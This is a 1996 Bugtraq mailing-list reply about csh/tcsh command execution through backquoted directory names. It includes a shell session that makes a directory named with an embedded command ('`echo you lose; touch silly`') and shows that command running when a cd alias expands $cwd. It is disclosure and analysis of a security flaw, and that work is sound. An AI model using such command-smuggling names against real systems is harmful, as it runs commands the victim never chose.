[3375] in bugtraq
Re: tee see shell problems
daemon@ATHENA.MIT.EDU (Paul Szabo)
Tue Sep 17 21:21:44 1996
Date: Wed, 18 Sep 1996 10:44:09 +1000
Reply-To: Paul Szabo <szabo_p@MATHS.SU.OZ.AU>
From: Paul Szabo <szabo_p@MATHS.SU.OZ.AU>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
> A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
> out with BSDI anyway.) that allows the execution of arbitrary commands
> when changing into directories that are enclosed with back tic's.
It seems to me that the problem may be with the way you define your cd
command: surely it is the expansion of $cwd, if containing backquotes, that
does the damage. (csh is known to do several passes of variable and command
substitution.) I have the following under /bin/csh, both with Apollo
Domain/OS and DEC Alpha OSF/1 (dUNIX v3.2 or v4.0):
tmp% pwd
/tmp
tmp% which cd
alias/cd 'chdir !*; set prompt="$cwd:t% "'
tmp% mkdir '`echo you lose; touch silly`'
tmp% ls -l
total 1
drwx------ 2 psz system 512 Sep 18 10:28 `echo you lose; touch silly`
tmp% cd *echo*
you lose% pwd
/tmp/`echo you lose; touch silly`
you lose% ls -l
total 0
-rw------- 1 psz system 0 Sep 18 10:28 silly
Paul Szabo - System Manager // School of Mathematics and Statistics
psz@maths.usyd.edu.au // University of Sydney, NSW 2006, Australia
